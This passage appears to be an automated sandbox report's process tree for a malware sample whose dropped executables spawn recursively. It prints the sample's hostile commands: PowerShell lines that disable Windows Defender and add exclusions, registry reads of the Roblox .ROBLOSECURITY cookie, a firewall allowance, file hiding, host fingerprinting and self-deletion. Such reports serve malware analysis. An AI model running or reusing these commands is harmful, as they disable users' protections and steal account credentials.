  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4628
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3108
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2704
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4360
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:4888
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:2820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4100
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3176
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe" && pause
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:232
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2128
- C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
  "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2264
- - C:\Users\Admin\AppData\Local\Temp\svhost.exe
    "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
    3⤵
    - Executes dropped EXE
    PID:1660
  - - C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
      4⤵
      PID:1988
- - C:\Users\Admin\AppData\Local\Temp\Server.exe
    "C:\Users\Admin\AppData\Local\Temp\Server.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:1000
  - - C:\Users\Admin\AppData\Local\Temp\._cache_Server.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_Server.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3176
    - - C:\Users\Admin\AppData\Roaming\Server.exe
        
        "C:\Users\Admin\AppData\Roaming\Server.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4616
    - - C:\Users\Admin\AppData\Roaming\conhost.exe
        
        "C:\Users\Admin\AppData\Roaming\conhost.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4460
- - C:\Users\Admin\AppData\Local\Temp\Maple.exe
    "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:4100
  - - C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
      4⤵
      Executes dropped EXE
      PID:3580
- - C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
    "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
    3⤵
    PID:2292
  - - C:\Users\Admin\AppData\Local\Temp\svhost.exe
      "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
      4⤵
      Executes dropped EXE
      PID:1360
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        5⤵
        
        PID:4868
  - - C:\Users\Admin\AppData\Local\Temp\Server.exe
      "C:\Users\Admin\AppData\Local\Temp\Server.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:4620
    - - C:\Users\Admin\AppData\Local\Temp\._cache_Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Server.exe"
        5⤵
        Executes dropped EXE
        
        PID:4580
      - C:\Users\Admin\AppData\Roaming\Server.exe
        
        "C:\Users\Admin\AppData\Roaming\Server.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2700
      - C:\Users\Admin\AppData\Roaming\conhost.exe
        
        "C:\Users\Admin\AppData\Roaming\conhost.exe"
        6⤵
        Executes dropped EXE
        
        PID:1240
  - - C:\Users\Admin\AppData\Local\Temp\Maple.exe
      "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2260
    - - C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        5⤵
        Executes dropped EXE
        
        PID:1276
  - - C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
      "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
      4⤵
      PID:3708
    - - C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        5⤵
        Executes dropped EXE
        
        PID:224
      - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        6⤵
        
        PID:3860
    - - C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1448
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Server.exe" "Server.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2680
    - - C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:484
      - C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        6⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1132
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:1548
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        7⤵
        Views/modifies file attributes
        
        PID:720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2360
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1768
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        7⤵
        
        PID:5052
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        7⤵
        
        PID:5008
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:1592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4688
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:4360
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe" && pause
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4316
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3600
    - - C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        5⤵
        
        PID:3456
      - C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        6⤵
        Executes dropped EXE
        
        PID:1644
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        7⤵
        
        PID:4500
      - C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:724
      - C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1068
        
        C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        7⤵
        Executes dropped EXE
        
        PID:4808
      - C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        6⤵
        
        PID:3164
        
        C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        7⤵
        Executes dropped EXE
        
        PID:3604
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        8⤵
        
        PID:4632
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c taskkill /f /PID "4720"
        9⤵
        
        PID:1940
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /PID "4720"
        10⤵
        Kills process with taskkill
        
        PID:2020
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        
        PID:3564
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        10⤵
        
        PID:4780
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1340
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:4292
        
        C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        8⤵
        
        PID:2224
        
        C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        7⤵
        
        PID:1040
        
        C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        8⤵
        
        PID:3984
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        9⤵
        
        PID:404
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        8⤵
        
        PID:3220
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        8⤵
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        9⤵
        
        PID:236
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        10⤵
        
        PID:2332
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        10⤵
        Views/modifies file attributes
        
        PID:2896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3040
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:1040
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        10⤵
        
        PID:5008
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:484
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        10⤵
        
        PID:3964
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:2820
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        10⤵
        
        PID:1984
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:3004
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        10⤵
        
        PID:5068
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3412
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        10⤵
        Detects videocard installed
        
        PID:916
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe" && pause
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1492
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3004
        
        C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        8⤵
        
        PID:4136
        
        C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        9⤵
        
        PID:3316
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        10⤵
        
        PID:3164
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        9⤵
        
        PID:2420
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        9⤵
        
        PID:3176
        
        C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        10⤵
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        9⤵
        
        PID:1584
        
        C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        10⤵
        
        PID:2736
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        11⤵
        
        PID:2976
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        10⤵
        
        PID:2296
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        10⤵
        
        PID:3876
        
        C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        11⤵
        
        PID:4344
        
        C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        10⤵
        
        PID:4912
        
        C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        11⤵
        
        PID:2360
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        12⤵
        
        PID:3976
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        11⤵
        
        PID:3612
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        11⤵
        
        PID:2976
        
        C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        12⤵
        
        PID:2824
        
        C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        11⤵
        
        PID:3024
        
        C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        12⤵
        
        PID:1420
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        13⤵
        
        PID:2352
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c taskkill /f /PID "4780"
        14⤵
        
        PID:4332
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /PID "4780"
        15⤵
        Kills process with taskkill
        
        PID:3800
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        14⤵
        
        PID:3192
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        15⤵
        
        PID:5076
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        12⤵
        
        PID:1592
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        12⤵
        
        PID:2260
        
        C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        13⤵
        
        PID:1980
        
        C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        12⤵
        
        PID:4568
        
        C:\Users\Admin\AppData\Local\Temp\svhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        13⤵
        
        PID:2820
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        14⤵
        
        PID:3860
        
        C:\Users\Admin\AppData\Local\Temp\Server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        13⤵
        
        PID:4628
        
        C:\Users\Admin\AppData\Local\Temp\Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
        13⤵
        
        PID:4064
        
        C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        14⤵
        
        PID:3448
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:1988
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
        15⤵
        Views/modifies file attributes
        
        PID:4700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4252
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        15⤵
        
        PID:4868
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        15⤵
        
        PID:2296
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        15⤵
        
        PID:4468
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        15⤵
        
        PID:3224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4700
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        15⤵
        Detects videocard installed
        
        PID:2448
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe" && pause
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1772
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4128
        
        C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
        13⤵
        
        PID:2448

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:664

C:\Users\Admin\AppData\Roaming\Ondrive.exe
C:\Users\Admin\AppData\Roaming\Ondrive.exe
1⤵
- Executes dropped EXE
PID:5076

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2104

C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
"C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
1⤵
PID:4624
- C:\Users\Admin\AppData\Local\Temp\svhost.exe
  "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
  2⤵
  PID:1660
- - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
    3⤵
    PID:2704
- C:\Users\Admin\AppData\Local\Temp\Server.exe
  "C:\Users\Admin\AppData\Local\Temp\Server.exe"
  2⤵
  PID:2352
- C:\Users\Admin\AppData\Local\Temp\Maple.exe
  "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
  2⤵
  PID:3768
- - C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
    "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
    3⤵
    PID:2408
- C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
  "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
  2⤵
  PID:4880
- - C:\Users\Admin\AppData\Local\Temp\svhost.exe
    "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
    3⤵
    PID:4292
  - - C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
      4⤵
      PID:1424
- - C:\Users\Admin\AppData\Local\Temp\Server.exe
    "C:\Users\Admin\AppData\Local\Temp\Server.exe"
    3⤵
    PID:3712
- - C:\Users\Admin\AppData\Local\Temp\Maple.exe
    "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
    3⤵
    PID:2840
  - - C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe"
      4⤵
      PID:1772
- - C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe
    "C:\Users\Admin\AppData\Local\Temp\CY2jVj7cNu8l.exe"
    3⤵
    PID:2972
  - - C:\Users\Admin\AppData\Local\Temp\svhost.exe
      "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
      4⤵
      PID:1240
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
        5⤵
        
        PID:1968
  - - C:\Users\Admin\AppData\Local\Temp\Server.exe
      "C:\Users\Admin\AppData\Local\Temp\Server.exe"
      4⤵
      PID:3760
